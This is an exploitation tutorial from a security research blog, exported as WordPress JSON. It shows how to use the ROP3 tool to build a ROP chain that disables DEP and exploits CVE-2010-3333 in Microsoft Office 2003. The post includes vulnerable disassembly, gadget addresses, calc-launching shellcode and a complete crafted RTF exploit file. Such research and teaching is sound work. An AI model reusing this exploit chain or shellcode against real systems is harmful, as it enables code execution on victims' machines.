{"id":400,"date":"2021-10-06T12:00:00","date_gmt":"2021-10-06T12:00:00","guid":{"rendered":"https:\/\/reversea.me\/?p=400"},"modified":"2021-10-06T18:06:40","modified_gmt":"2021-10-06T18:06:40","slug":"disabling-dep-in-windows-7-using-rop3","status":"publish","type":"post","link":"https:\/\/reversea.me\/index.php\/disabling-dep-in-windows-7-using-rop3\/","title":{"rendered":"Disabling DEP in Windows 7 using rop3"},"content":{"rendered":"<span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\">Reading Time: <\/span> <span class=\"rt-time\"> 8<\/span> <span class=\"rt-label rt-postfix\">minutes<\/span><\/span>\n<p><strong>TL;DR<\/strong> We show how to use the <a href=\"https:\/\/github.com\/reverseame\/rop3\"><code>ROP3<\/code><\/a> tool to build a user-defined Return-Oriented-Programming (ROP) exploit for a(n old, but gold!) Microsoft Office vulnerability. This tool was presented as part of our contribution in WOOT&#8217;21 <a href=\"https:\/\/ieeexplore.ieee.org\/document\/9474272\">&#8220;Evaluation of the Executional Power in Windows using Return Oriented Programming&#8221;<\/a> (you can read more about this work <a href=\"https:\/\/reversea.me\/index.php\/how-powerful-are-return-oriented-programming-attacks\/\">in this other post<\/a>). In particular, we focus on CVE-2010-3333, a stack-based buffer overflow in Microsoft Office that allows attackers to execute arbitrary code through a crafted RTF file. Our exploit relies on ROP to first disable NX (also called W^X) protection at the Windows process level and then pop up a <code>Calc<\/code> process (yeah, as simple as it sounds, sorry!).<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>As explained <a href=\"https:\/\/reversea.me\/index.php\/how-powerful-are-return-oriented-programming-attacks\/\">in this previous post<\/a>, the ROP3 tool is developed in Python and relies on the Capstone disassembly framework to find gadgets, operations, and ROP chains.<\/p>\n\n\n\n<p>ROP3 natively supports the virtual operations that make up ROPLANG, which is a virtual language that we created to represent a ROP chain in an abstract way. In particular, ROPLANG defines a set of operations (arithmetic, assignment, dereferencing, logical, and branching\/unbranching operations) that are then mapped to specific ROP gadgets.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/reverseame\/rop3\/releases\/tag\/v1.0.0\">ROP3 version 1.0<\/a> has been recently released, incorporating a bunch of updates:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Notification of side-effects (e.g., if gadget alters <code>esp<\/code>). Now it takes them into account when building ropchains.<\/li><li>Removing duplicates now shows how many of the same gadgets were found in different addresses.<\/li><li>New <code>badchar<\/code> option to remove certain bytes from gadget addresses.<\/li><\/ul>\n\n\n\n<p>In what follows, we will show how the <a href=\"https:\/\/github.com\/reverseame\/rop3\"><code>ROP3<\/code><\/a> tool can be used to automatically generate a user-defined ROP chain using a real vulnerability as a case study.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">CVE-2010-3333: an Old, but Gold MS Office Vulnerability!<\/h2>\n\n\n\n<p>As a case study, we consider the Microsoft Office vulnerability CVE-2010-3333, which affected Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, and Office for Mac 2011. This vulnerability was disclosed in September 2010 and later patched in MS10-087 (released in November 09, 2010). Despite this timely response from Microsoft, this vulnerability was used to great effect in November 2012 to attack NATO&#8217;s Special Operations Headquarters, as well as a critical infrastructure company. These attacks were conducted via spear phishing attaching a specially crafted Rich Text Format (RFT) document exploiting the vulnerability, allowing the attackers to execute arbitrary code through a stack-based buffer overflow. You can <a href=\"https:\/\/www.sophos.com\/en-us\/medialibrary\/PDFs\/technical%20papers\/sophosrichtextformatmanipulationstpna.pdf\">read this document<\/a> to learn more about the different forms of this exploit and how the exploit files have evolved.<\/p>\n\n\n\n<p>The <a href=\"http:\/\/www.snake.net\/software\/RTF\/Old\/RTF-Spec-1.0.rtf\">Rich Text Format (RTF) is a file format developed by Microsoft<\/a> to facilitate the exchange of text files between different word processors. An RTF file starts with the <code>frtf1<\/code> tag and is made up of plain text, control words, control symbols, and groups within braces. The CVE-2010-3333 is exploited through the <code>pFragments<\/code> property, which is an optional property of geometry shapes to describe multiple paths and parts within a shape. This property is defined in the RTF specification as:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">{\\shp{\\sp{\\sn pFragments}{\\sv value}}}<\/code><\/pre>\n\n\n\n<p>The value type of <code>pFragments<\/code> is an array value. In the RTF file format, arrays are formatted as a sequence of numbers separated by semicolons. The first number indicates the size (in bytes) of each element in the array. Valid numbers are 2, 4, or 8, according to the RTF specification. When the element size is 8, each element is represented as a group of two numbers. The second number indicates the number of elements in the array.<\/p>\n\n\n\n<p>As for the CVE-2010-3333 vulnerability, it is found in the file <code>MSO.DLL<\/code>, which is a component of the Microsoft Office suite. In this post, we focus on the file <code>MSO.DLL<\/code> version 11.0.5606 and MD5 <code>251C11444F614DE5FA47ECF7275E7BF1<\/code>, shipped with the Microsoft Office 2003 suite.<\/p>\n\n\n\n<p>The code snippet responsible for parsing the <code>pFragments<\/code> and triggering the stack-based buffer overflow is located at <code>0x30f4cc5d<\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">0x30f4cc5d  push ebp\n0x30f4cc5e  mov ebp, esp\n0x30f4cc60  sub esp, 0x14\n(...)\n0x30f4cc93  call dword [eax + 0x1c] ;  calls to MSO.30e9eb62\n0x30f4cc96  mov eax, dword [ebp + 0x14]\n0x30f4cc99  push dword [ebp + 0x18]\n0x30f4cc9c  mov edx, dword [ebp - 0x10]\n0x30f4cc9f  neg eax\n0x30f4cca1  sbb eax, eax\n0x30f4cca3  lea ecx, [ebp - 8]\n0x30f4cca6  and eax, ecx\n0x30f4cca8  push eax\n0x30f4cca9  push dword [ebp + 8]\n0x30f4ccac  call 0x30f4cb1d\n0x30f4ccb1  test al, al\n0x30f4ccb3  je 0x30f4cd51\n(...)  \n0x30f4cd51  pop esi\n0x30f4cd52  pop ebx\n0x30f4cd53  pop edi\n0x30f4cd54  leave\n0x30f4cd55  ret 0x14<\/code><\/pre>\n\n\n\n<p>The first number of the <code>pFragments<\/code> value must be an invalid number according to the RTF specification (that is, different from 2, 4, or 8) to trigger the vulnerability. Line 5 calls the function <code>0x30e9eb62<\/code>, which effectively produces the stack-based overflow vulnerability. This function is fully listed below:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">0x30e9eb62  push edi\n0x30e9eb63  mov edi, dword [esp + 0xc]\n0x30e9eb67  test edi, edi\n0x30e9eb69  je 0x30e9eb92\n0x30e9eb6b  mov eax, dword [esp + 8]\n0x30e9eb6f  mov ecx, dword [eax + 8] \n0x30e9eb72  and ecx, 0xffff\n0x30e9eb78  push esi\n0x30e9eb79  mov esi, ecx\n0x30e9eb7b  imul esi, dword [esp + 0x14]\n0x30e9eb80  add esi, dword [eax + 0x10]\n0x30e9eb83  mov eax, ecx\n0x30e9eb85  shr ecx, 2\n0x30e9eb88  rep movsd es:[edi], dword ptr [esi]\n0x30e9eb8a  mov ecx, eax\n0x30e9eb8c  and ecx, 3\n0x30e9eb8f  rep movsb es:[edi], byte ptr [esi]\n0x30e9eb91  pop esi\n0x30e9eb92  pop edi\n0x30e9eb93  ret 0xc<\/code><\/pre>\n\n\n\n<p>The binary code of this function is very similar to a <code>memcpy()<\/code> inline function: it receives two parameters, the first is a pointer that points to the content of the <code>pFragments<\/code> value; while the second parameter is a buffer located on the stack. Those values are eventually loaded into the <code>esi<\/code> and <code>edi<\/code> registers, respectively (lines 2 and 9), and the buffer overflow finally occurs via the <code>rep movsd<\/code> instruction on line 14. Although the function shown above ends normally, an attacker can modify the return address of the called function using a specially crafted RTF file. That is, the hijacking of the control-flow occurs after the execution of the <code>ret<\/code> instruction.<\/p>\n\n\n\n<p>Let us finally recall that the <code>call<\/code> instruction on line 15 of <code>0x30f4cc5d<\/code> does some processing on the content of the <code>pFragments<\/code> value, so it must be executed without errors to successfully reach the end of the triggering function.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Using ROPLANG to Create our ROP Chain<\/h2>\n\n\n\n<p>As a victim model, we consider that the workstations are running the Windows 7 SP1 Professional 32-bit operating system and Microsoft Word 2003 version 11.5604.5606. In addition, enforced by the organization security policies, W^X protection (called Data Execution Prevention in Windows) is always on, regardless of whether or not applications are compiled with this defense in place.<\/p>\n\n\n\n<p>Therefore, to successfully exploit this vulnerability, the attacker must first defeat the W^X protection. To do so, the attacker will build a ROP chain. The easiest way is to make use of the <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/winbase\/nf-winbase-setprocessdeppolicy\"><code>SetProcessDEPPolicy()<\/code><\/a> API, a Windows API that changes the W^X policy of a running process. This function receives a flag value that indicates whether the W^X policy should be disabled or enabled for the current process. After disabling the W^X policy, the attacker can successfully bypass control-flow execution to the process stack. This means that the stack pointer register value (stored in <code>esp<\/code>) must be known beforehand. However, this knowledge is rare in practical scenarios, since stack addresses are generally randomized upon execution. To deal with this issue, the attacker can make use of the <code>pushad<\/code> instruction, which pushes the contents of the CPU general-purpose registers onto the stack in the following order: <code>eax<\/code>, <code>ecx<\/code>, <code>edx<\/code>, <code>ebx<\/code>, <code>esp<\/code> (original value), <code>ebp<\/code>, <code>esi<\/code>, and <code>edi<\/code>. After the execution of <code>pushad<\/code>, the <code>esp<\/code> value is modified accordingly.<\/p>\n\n\n\n<p>Let us illustrate how <code>pushad<\/code> works with an example. Suppose the state of the CPU general-purpose registers is as follows, just before executing the <code>pushad<\/code> instruction:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>register<\/th><th>value<\/th><\/tr><\/thead><tbody><tr><td><code>eax<\/code><\/td><td><code>0x00000000<\/code><\/td><\/tr><tr><td><code>ecx<\/code><\/td><td><code>0x11111111<\/code>&nbsp;<\/td><\/tr><tr><td><code>edx<\/code><\/td><td><code>0x22222222<\/code>&nbsp;<\/td><\/tr><tr><td><code>ebx<\/code><\/td><td><code>0x33333333<\/code>&nbsp;<\/td><\/tr><tr><td><code>esp<\/code><\/td><td><code>0xCAFEBABE<\/code><\/td><\/tr><tr><td><code>ebp<\/code><\/td><td><code>0x44444444<\/code><\/td><\/tr><tr><td><code>esi<\/code><\/td><td><code>0x55555555<\/code><\/td><\/tr><tr><td><code>edi<\/code><\/td><td><code>0x66666666<\/code><\/td><\/tr><\/tbody><\/table><figcaption>Values of CPU general-purpose registers (before the execution of <code>pushad<\/code>)<\/figcaption><\/figure>\n\n\n\n<p>Once the <code>pushad<\/code> instruction is executed, the stack contains the following:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><code>esp -&gt;<\/code><\/td><td><code><code>0x66666666<\/code><\/code><\/td><\/tr><tr><td><\/td><td><code><code>0x55555555<\/code><\/code>&nbsp;<\/td><\/tr><tr><td><\/td><td><code><code>0x44444444<\/code><\/code>&nbsp;<\/td><\/tr><tr><td><\/td><td><code>0xCAFEBABE<\/code><\/td><\/tr><tr><td><\/td><td><code><code>0x33333333<\/code>&nbsp;<\/code><\/td><\/tr><tr><td><\/td><td><code><code>0x22222222<\/code><\/code><\/td><\/tr><tr><td><\/td><td><code><code>0x11111111<\/code><\/code><\/td><\/tr><tr><td><\/td><td><code>0x00000000<\/code><\/td><\/tr><\/tbody><\/table><figcaption>Contents of the stack (after the execution of <code>pushad<\/code>)<\/figcaption><\/figure>\n\n\n\n<p>As you can see, the stack pointer moves up (well, down, as the stack grows to lower memory addresses). Hence, once the <code>pushad<\/code> instruction is executed we can directly divert the control-flow of the program by setting the appropriate values in the CPU registers.<\/p>\n\n\n\n<p>For the sake of simplicity, as an adversary model we assume that the attacker knows any WinAPI address of their interest, such as the address of the <code>SetProcessDEPPolicy()<\/code> function (for instance, through a memory leak from the victim&#8217;s workstation), as well as the base address of the <code>MSO.DLL<\/code> file at the time of exploitation.<\/p>\n\n\n\n<p>In summary, the ROP chain will perform the following actions:<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Set the values of the CPU general-purpose registers appropriately, before executing <code>pushad<\/code>.<\/li><li>Execute <code>SetProcessDEPPolicy()<\/code>, just after the execution of the <code>pushad<\/code> instruction.<\/li><li>Divert the control-flow of the vulnerable program to the stack.<\/li><\/ol>\n\n\n\n<p>We can build our ROP chain to find the ROP gadgets that are available to set the appropriate values in the registers using ROPLANG:<\/p>\n\n\n\n<p>First, we need to load the <code>edi<\/code> and <code>esi<\/code> registers with a NOP gadget. Note that the values of these registers will be the addresses to which the control-flow will be redirected after the execution of <code>pushad<\/code>. Hence, we will look for a <code>nop()<\/code> operation, as well as <code>lc(edi)<\/code> and <code>lc(esi)<\/code> to pull two values from the stack to the registers:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">nop()\nlc(edi)\nlc(esi)<\/code><\/pre>\n\n\n\n<p>Note that the <code>nop()<\/code> operation is not native to ROPLANG. Fortunately, we can define it very easily using YAML syntax (in the <code>rop3<\/code>&#8216;s <code>gadgets\/user_defined.yaml<\/code> file):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">nop:\n  # ret\n  - # each operations can be composed of several sets\n    - mnemonic: ret<\/code><\/pre>\n\n\n\n<p>Next, we need to load the address of <code>SetProcessDEPPolicy()<\/code> in the <code>ebp<\/code> register. To do this, we just need a &#8220;load constant&#8221; operation on <code>ebp<\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">lc(ebp)<\/code><\/pre>\n\n\n\n<p>We then need to load a zero value into the <code>ebx<\/code> register. Note that we can use zero bytes in our ROP chain with no problem, as this is a valid byte in this case. This value will in fact be the parameter of the call to <code>SetProcessDEPPolicy()<\/code> once the control flow reaches this API (see the contents of the stack above: once <code>SetProcessDEPPolicy()<\/code> begins its execution, the return address and the parameters are naturally pointed by the stack pointer):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">lc(ebx)<\/code><\/pre>\n\n\n\n<p>The values of the other CPU registers do not matter. To finish, we need a <code>pushad; ret<\/code> ROP gadget to execute the <code>pushad<\/code> instruction and then achieve the successful exploitation as explained above. As before, this is not a native ROPLANG operation and hence we need to define our own operation in the <code>user_defined.yaml<\/code> file of <code>ROP3<\/code>. In particular, this gadget can be defined as:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">pushad:\n  - # just pushad\n    - mnemonic: pushal<\/code><\/pre>\n\n\n\n<p>Note that the mnemonic is <code>pushal<\/code>, since the <code>pushad<\/code> instruction is defined with this mnemonic in Capstone, the disassembler on which ROP3 is based. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Stitching All Together\u2026<\/h2>\n\n\n\n<p>Once that we have our ROP chain ready, we can run the <code>ROP3<\/code> tool to search for the available gadgets. Apart from the ROP chain, we have chosen a depth value of 2 (to limit the ROP gadget size to just 2 bytes) and have avoided gadgets that end in the <code>retf<\/code> instruction. As the search space, we have used the own <code>MSO.DLL<\/code> file:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">$ python3 rop3.py --binary ~\/MSO.DLL --ropchain rop_chain.txt --depth 2 --noretf\n================================================================================\nRopchain 1\n================================================================================\nnop()\n        [MSO.DLL @ 0x30c92448]: ret (x33616)\nlc(edi)\n        [MSO.DLL @ 0x30cae25c]: pop edi ; ret (x179)\nlc(esi)\n        [MSO.DLL @ 0x30ca32fd]: pop esi ; ret (x4668)\nlc(ebx)\n        [MSO.DLL @ 0x30ca3654]: pop ebx ; ret (x1047)\nlc(ebp)\n        [MSO.DLL @ 0x30ca32d1]: pop ebp ; ret (x230)\npushad()\n        [MSO.DLL @ 0x30ce03b5]: pushal ; ret (x14)<\/code><\/pre>\n\n\n\n<p>So, we were lucky this time! We have found enough gadgets in this file for each operation in our ROP chain. As a shellcode, we are going to use a simple shellcode that pops up a <code>Calc<\/code> application:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">33C0       xor eax, eax\n50         push eax\n6863616C63 push 'calc'\n8BC4       mov eax, esp\n6A05       push SW_SHOW\n50         push eax\nBFFDE53377 mov edi, kernel32.WinExec\nFFD7       call edi  <\/code><\/pre>\n\n\n\n<p>Now we can build our RTF file as follows (the text after the dash symbol is added to aid understanding, you will need to remove it!):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;4;010\n0020000014141414141414141414141414141414141414141 # padding\n4824c930  # ret\n0000000000000000000000000000000000000000\n5ce2ca30  # pop edi; ret\n4824c930  # ret\nfd32ca30  # pop esi; ret\n4824c930  # ret\n5436ca30  # pop ebx; ret\n00000000\nd132ca30  # pop ebp; ret\n2f602e77  # @SetProcessDEPPolicy()\nb503ce30  # pushal; ret\n33c0506863616c638bc46a0550bffde53377ffd7 # our shellcode :)\n}}}}<\/code><\/pre>\n\n\n\n<p>Finally, we can just double click on the RTF file and\u2026<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"495\" src=\"https:\/\/reversea.me\/wp-content\/uploads\/2021\/08\/poc_calc-1024x495.png\" alt=\"\" class=\"wp-image-401\" srcset=\"https:\/\/reversea.me\/wp-content\/uploads\/2021\/08\/poc_calc-1024x495.png 1024w, https:\/\/reversea.me\/wp-content\/uploads\/2021\/08\/poc_calc-300x145.png 300w, https:\/\/reversea.me\/wp-content\/uploads\/2021\/08\/poc_calc-768x371.png 768w, https:\/\/reversea.me\/wp-content\/uploads\/2021\/08\/poc_calc.png 1255w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>Proof of Concept of a RTF file exploiting the CVE-2010-3333 vulnerability<\/figcaption><\/figure>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"350\" height=\"196\" src=\"https:\/\/reversea.me\/wp-content\/uploads\/2021\/08\/magic.gif\" alt=\"\" class=\"wp-image-402\"\/><\/figure><\/div>\n\n\n\n<p>Voil\u00e0! As you see, a new <code>Calc<\/code> process appears whose parent process is <code>WINWORD<\/code>. So, our exploit has been a success!<\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p><em>And\u2026 that&#8217;s all, folks! In this post, we have revisited our <code>ROP3<\/code> tool and introduced how we can build a ROP chain using ROPLANG operations. Additionally, we have also shown how user-defined ROP gadgets can be added into ROPLANG operations to meet our exploitation goals. Recall that we are open to new ideas and collaborations to investigate offensive security, do not hesitate to contact us about it!<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\">Reading Time: <\/span> <span class=\"rt-time\"> 8<\/span> <span class=\"rt-label rt-postfix\">minutes<\/span><\/span>TL;DR We show how to use the ROP3 tool to build a user-defined Return-Oriented-Programming (ROP) exploit for a(n old, but gold!) Microsoft Office vulnerability. This tool was presented as part of our contribution in WOOT&#8217;21 &#8220;Evaluation of the Executional Power in Windows using Return Oriented Programming&#8221; (you can read more about this work in this [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[32,18,15],"tags":[35,33,14],"class_list":["post-400","post","type-post","status-publish","format-standard","hentry","category-exploiting","category-ms-windows-internals","category-tools","tag-automatic-exploit","tag-rop","tag-windows","no-featured-image"],"_links":{"self":[{"href":"https:\/\/reversea.me\/index.php\/wp-json\/wp\/v2\/posts\/400","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reversea.me\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reversea.me\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reversea.me\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/reversea.me\/index.php\/wp-json\/wp\/v2\/comments?post=400"}],"version-history":[{"count":15,"href":"https:\/\/reversea.me\/index.php\/wp-json\/wp\/v2\/posts\/400\/revisions"}],"predecessor-version":[{"id":439,"href":"https:\/\/reversea.me\/index.php\/wp-json\/wp\/v2\/posts\/400\/revisions\/439"}],"wp:attachment":[{"href":"https:\/\/reversea.me\/index.php\/wp-json\/wp\/v2\/media?parent=400"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reversea.me\/index.php\/wp-json\/wp\/v2\/categories?post=400"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reversea.me\/index.php\/wp-json\/wp\/v2\/tags?post=400"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}